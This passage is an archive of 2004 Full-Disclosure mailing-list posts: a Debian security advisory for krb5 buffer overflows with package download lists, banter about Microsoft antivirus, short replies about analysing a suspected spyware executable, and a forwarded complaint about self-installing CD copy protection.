iD8DBQFA0Pdw9ehacAz5CRoRAmjzAJwKR8ktCSExCrk7HydJzSNzLZde3ACgjAvq
tqWdhhfmX8PMKiRFPgBYxNE=
=CK7z
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [SECURITY] [DSA 520-1] New krb5 packages fix buffer overflows

debian-security-announcelists.debian.org
Date: Wed Jun 16 2004 - 21:30:48 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 520-1 securitydebian.org
http://www.debian.org/security/ Matt Zimmerman
June 16th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : krb5
Vulnerability : buffer overflows
Problem-Type : remote
Debian-specific: no
CVE Ids : CAN-2004-0523

In their advisory MITKRB5-SA-2004-001, the MIT Kerberos announced the
existence of buffer overflow vulnerabilities in the
krb5_aname_to_localname function. This function is only used if
aname_to_localname is enabled in the configuration (this is not
enabled by default).

For the current stable distribution (woody), this problem has been
fixed in version 1.2.4-5woody5.

For the unstable distribution (sid), this problem has been fixed in
version 1.3.3-2.

We recommend that you update your krb5 package.

Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

    http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody5.dsc
      Size/MD5 checksum: 750 88922316a5c4dc4f54eedfc8d1b2b21e
    http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody5.diff.gz
      Size/MD5 checksum: 77079 1d99337aa5734ab47878c706c1cd16e7
    http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4.orig.tar.gz
      Size/MD5 checksum: 5443051 663add9b5942be74a86fa860a3fa4167

Architecture independent components:

http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.2.4-5woody5_all.deb
Size/MD5 checksum: 514592 b608f9f7c599049696daa569a9a9c95b

Alpha architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 253392 39dace8011ec70211cafe7482a464bef
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 217158 2eec6d86a559c9bf151b06bb55916347
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 62608 6ad21c730aa61227f335042c83057e35
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 251804 32c06efac81f7f875e993e7f6343ee10
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 76040 2e6e74208a9c7f401c23076d32e29d3d
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 58704 897ad549370be37234179d87084012e9
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 207166 60ec8f0d5f60af7e03f18d68bdd1bfc3
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 83328 49d5415c510a3b16b0c7e6831d6295d1
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 632940 b5feb5c5d4ffb4dcc36607fb6c094ddd
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_alpha.deb
      Size/MD5 checksum: 367114 1126cddacb3eb385c363cc24bd8ccf30

ARM architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 196910 00f2c6dc3b783b559418d3acaae9ccc4
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 160204 6fbdbe00198ac08c127da7b605cb4401
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 48382 06c5be009cd9391342dfc97e18cc1c11
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 198234 7a6fc77bf7307de8f5cb7ab203586e94
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 63316 8e5b77aaefc5319b730b24ebd39d4c6d
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 48952 1c46d9156b91cfbe3bf2a7b2406c4d19
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 165652 654f978cf8e21e1928b08ee344fda8da
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 73122 f5052a8743c4fd1434fba81040c39dd2
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 492900 fce4b2e7bd8c66896bf181900fb61ec7
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_arm.deb
      Size/MD5 checksum: 294728 f689f57b800b125f4ba3d3d5043dcb68

Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 178772 5088ddd2621dbab5c59dc5e249240a1b
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 155952 07fce3180d9959b4dfee76c6c120b6c0
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 45954 fe40c7fa5d4f67652b43df8e96ec3f17
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 178500 774028ad020dea596125afc6d52a7085
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 61142 6995fa078363df683f8f4bafab474733
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 46264 d53bc6f536632e486599e65e9e36542e
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 154706 1f2eeeed38ab36e5f2f7a523736505bf
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 71530 a67b57f513523801f85c7b65f8963f8c
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 433428 968fa83dd497f71dd640f8b4e6974375
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_i386.deb
      Size/MD5 checksum: 293446 53eeba2cb4ff3b08f75c9f7d368ee843

Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 321946 6ca872f52aedae772327b697dfde71b6
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 266092 f41935d16d8afb9a472a10784c3a7553
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 73348 0436c2b34fb854802246cc38b4a9a4c3
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 321900 7d6ff9cb6b640a17a3dca04b641a879b
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 91638 98299fc14a6c8011348a6d67219636b7
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 70292 81cc3db5ee795199744e3d991eff172d
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 255894 bdd40f67173113249af37954a68925e6
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 106954 c2fa05c6b6899f53c5c7efbdaac3f0e7
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 705264 eeb1f09bf20f6f336da6b4c65e982e45
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_ia64.deb
      Size/MD5 checksum: 474326 834b32c98301ac138e00442262281f06

HP Precision architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 214284 152da60f5b2d3aadf5d34a90758b52e0
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 189510 d19d97ccc0096676387ecb66292e98a1
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 53670 21e95a71a01d673273bed6c7e960f577
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 213770 d04452049be7561471f2c0d7a839a74d
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 68366 9757bc2a367432d6287709920b5996b0
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 55492 9bb3a916db98c1001c8330751e6d8505
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 182678 c499c90b82536f7af26c79ccbdf7bb9f
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 84616 c6163555a4f4e93fb56eb19afab8970d
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 557526 46404537730a0fcd7e66ba20221004ba
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_hppa.deb
      Size/MD5 checksum: 361794 2247c6ec0ee126dce4280d317ea5fe4a

Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 163994 64e2e6b310f729a633868e0dcff92cc5
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 144502 6d9020501770a02d1b5edf62d7187e58
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 44132 d4af8c3649f93e71c44a1b373e0b80c3
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 163732 c30ef8c45ef46b816b00336eed65a902
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 56650 85224bbf810310a04e0f254dd0e13bb4
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 44432 001261117d31c9e610b49066044fd438
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 145748 78d472cdafa35eb0bd7e4cb75b0623b0
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 69570 127110f20badf11f06b1fd09911b4975
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 408486 0f5ecf090b19fee6c02d8ee4f6f6b701
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_m68k.deb
      Size/MD5 checksum: 276790 ea346ea12c2f36680bbb73253e8a67ec

Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 206332 4f409bdcd19dbcd63a919158504330b6
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 190876 da73ca10271b7ab992201fa1e8865e0b
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 53108 e3697a84791b6c9c94dd2090d2393abc
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 209248 cf57ebb6de38746cb2554185a86db959
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 66188 c359609fa890dffdebb6bab042fa30f1
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 54668 c95a9cc71275c1ffe74caed804e1e4e9
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 175086 f14ebe5e1493c320ca5eabf7661d83d3
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 71782 fcdf07c4a596cc203e69e1b3fa61a9b7
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 540812 5fe78475feb1237afc53c9cfc6235ba0
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_mips.deb
      Size/MD5 checksum: 308072 a073afa9cb406e7e9b87c411fe71e7cf

Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 210428 c57ae1baeb412e9e39bffaf3e6eafc19
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 190584 d9637a661a7d76b4d2ac7ce2d2ebdfe9
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 53304 b748e107e9ae4c5c6b43d71ff0f1c82c
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 212884 cf8b846996cc4dd9a563c164134dfcb9
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 66512 82eda58a3c77d89563d230c2f4a471f2
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 54538 6a80de80f46ad13cb4545991776c98fd
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 176876 5bbd1da8fca246767e66d711630cb6b1
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 71580 11dac89ceff65cc4da44337b3027e7b8
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 540372 72c5320274b851ea31d485e8c9d07116
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_mipsel.deb
      Size/MD5 checksum: 306698 859c21ad06284485f0b7f1fead9da1b1

PowerPC architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 188054 363da150a42cee7367583fdfc90c6bf9
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 163744 b395a1a41eff5721d6351518ea572610
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 48964 b3896b0ac107e00a5ab3da1098c6a4cf
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 189144 fb6a9fcd6528aea01560c1ee4c94b2f1
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 62322 f872293b6c1b9ba9e2e035ace829507d
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 48928 a76a17aef53d694b4c560118f388cb03
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 162398 cf177c01953e47e566de40280bd08b46
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 73534 3dff6d87ccbc7b2fd66d98d483c7bb00
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 490456 aad2e60648fb2fc71c8146d3404985b1
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_powerpc.deb
      Size/MD5 checksum: 303092 e2b1effe6d3946de748e35e386759ee4

IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 188904 6fc5f0333f635e8f047e17085abf3270
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 166020 35b74993495f29d9bfa72d4aa988971d
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 49892 cec7b75924c666072d43be9a87ae3dc4
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 190238 f6bc7f11baea1fbee5c453877166f7ca
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 66682 081a0113d851220733e9f6d208280a90
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 49868 b920cb787b60dbbcbb89e43d8b6a4702
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 164036 3416a67ab9ea1af7a39a8456f49c86df
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 76076 fceff5bf712f16a0ea788e5f74ba21a5
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 452962 29b7633718ca8389ab0c2e011e5f9be7
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_s390.deb
      Size/MD5 checksum: 319182 95ff63b6ea8ab3bf573c5efaea5334da

Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 183032 341a9fb2d89ea7d685e3b5a3365c59ce
    http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 172630 023d4ea8ff07488b730d956443159d9c
    http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 49378 c575434808db59920f3463adfa046cfd
    http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 183982 0aa7443dd53e7f53cd1b872c6fcbabdb
    http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 63998 cbcd6b93ae18a1383ce8f8e2e5868ba9
    http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 49336 71527610b9405d3edcf4c7e0fa192334
    http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 159144 51fa34206e1a4de013fbb3991bdc33b2
    http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 72884 a209925e53a9d35354cef146aa7cf392
    http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 462462 1035d9e5f0450c933cf79add5540a646
    http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_sparc.deb
      Size/MD5 checksum: 300906 5333154983b684450cb5a4c702216542

These files will probably be moved into the stable distribution on
its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA0QJSArxCt0PiXR4RAn/1AJ44Z+oGkhWfO+M0Y15Wv/TBSdRYDACeIGLo
X2uJv+17KQFGR6KqZsSFse8=
=EXrB
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] MS Anti Virus?

From: Chris Cappuccio (chrisnmedia.net)
Date: Wed Jun 16 2004 - 21:56:52 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I hate to say this, but I don't think Microsoft software could be any
worse than Symantec...

Andre Ludwig [andre.ludwiggmail.com] wrote:
> Think the mafia refers to this as a protection racket...
>
> man so much can be made of this its a techy comedy gold mine.
>
>
> "our software sucks so bad that the market for anti virus software for
> our platform is such a lucrative market that we cant stay out of it"
>
> Andre Ludwig CISSP
>
> On Wed, 16 Jun 2004 19:41:49 -0400, slacker <leetslackersofthome.net> wrote:
> >
> > <snip>
> > > SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
> > > Research) is still on track to offer an anti-virus product that will
> > > compete against similar software offered by Symantec Corp. (SYMC.O:
> > > Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
> > > Profile, Research) , the world's largest software maker said late on
> >
> > Oh yeah, what's the average delay to release on exploit patches? What makes
> > me think that they are going to be that slow on releasing AV updates? =P
> >
> > slacker
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

--
"When it absolutely, positively had to be there yesterday: Temporal Express"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] MS Anti Virus?

From: Robert Michael Slade (rsladevcn.bc.ca)
Date: Wed Jun 16 2004 - 22:48:45 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ah, how soon they forget. (Kids these days ...)

Heck, *I* forget. Was it Windows 3.0 or 3.1? Anyway, DOS 6.

And lo, Microsoft went forth unto the land, and spake unto the makers of
AV, and did say, who will give unto us their product for cheap, that we
may call it by our name, and all geeks may use of it, and bless our name.
And the makers of AV muttered amungst themselves, and said, and if we do
this, what shall it profit us? And Microsoft spake unto them saying, are
ye not the makers of endless upgrades? And shall ye not sell these
upgrades unto those who have need of them since all will have thine
product even though it be called by our name?

And lo, Central Point did underbid all the others. And Microsoft did take
unto itself CPAV, and call it MSAV, and all those who purchased DOS 6 did
partake of it, and thought that it was good. But none knew that they
needed to upgrade it. And then came unto Microsoft and Central Point the
shame of the 14 bytes, and geeks despised them. And Central Point was
cast into Gehenna, or Symantec, which is the same thing.

rsladevcn.bc.ca sladevictoria.tc.ca rsladesun.soci.niu.edu
Find virus, book info http://victoria.tc.ca/techrev/rms.htm
Mirrored at http://sun.soci.niu.edu/~rslade/rms.htm
Review mailing list: send mail to techbooks-subscribeegroups.com
Robert Slade's Guide to Computer Viruses, 0-387-94663-2 (800-SPRINGER)
Viruses Revealed 0072130903
Software Forensics (forthcoming)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Thu Jun 17 2004 - 06:36:30 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> > Looks the june4.exe is some kind of spyware. It reference to another
> > site "cjdra.com", possibly uploading user information there.
> By chance, do you know of a similar tools that runs under linux?

gdb or under softice under wine ?

-aditya

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)mªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] RE: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Thu Jun 17 2004 - 06:36:13 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

please stop spamming the list with your advertisiement of partner programs

----- Original Message -----
From: "Bob Walton" <bobitsecsystems.com>
To: "'Thierry Carrez'" <koongentoo.org>; <gentoo-announcelists.gentoo.org>
Cc: <bugtraqsecurityfocus.com>; <full-disclosurelists.netsys.com>; <security-alertslinuxsecurity.com>
Sent: Wednesday, June 16, 2004 9:27 PM
Subject: [Full-Disclosure] RE: [ GLSA 200406-10 ] Gallery: Privilege escalation vulnerability

> You all might want to take a look at Americas best kept secret, security for
> wireless internet (we have been doing it for 5 years)would truly value your
> opinion. Bob Walton 877-326-5990 bobitsecsystems.com
>

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)mªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Thu Jun 17 2004 - 06:36:18 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> http://upx.sourceforge.net/#download

upx is a cross platfrom executable file compreession tool

>>By chance, do you know of a similar tools that runs under linux?

maybe u want a debugger and not a file compreession tool ?
-aditya

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)mªÿr‰ÿ

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [Fwd: Caveat Lector: Beastie Boys Evil]

listnolog.org
Date: Thu Jun 17 2004 - 02:39:31 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-------- Original Message --------
Subject: Caveat Lector: Beastie Boys Evil
Date: Wed, 16 Jun 2004 01:10:23 -0700
From: Dragos Ruiu <drkyx.net>
Organization: All Terrain Ninjas
To: bugtraqsecurityfocus.com

Well I truly regret actually purchasing a copy of the new Beastie Boys
album to support them.

It seems that Capitol Records has some sort of new copy protection
system, that automatically, silently, installs "helpful" copy protection
software on MacOS and Windows as soon as you insert the CD into default
systems.
I'm not sure exactly what it does yet, but I am sure regreting actually
purchasing said media now... they don't deserve my money if they choose
to pull stupid stunts like this. Installing software without your
permission sounds like viral malware behaviour to me. I certainly hope
the AV companies put signatures into their products for this crap.

They include some sort of uninstaller buried on there for Windows, but
I see no such thing for MacOS. If anyone has disassembled the
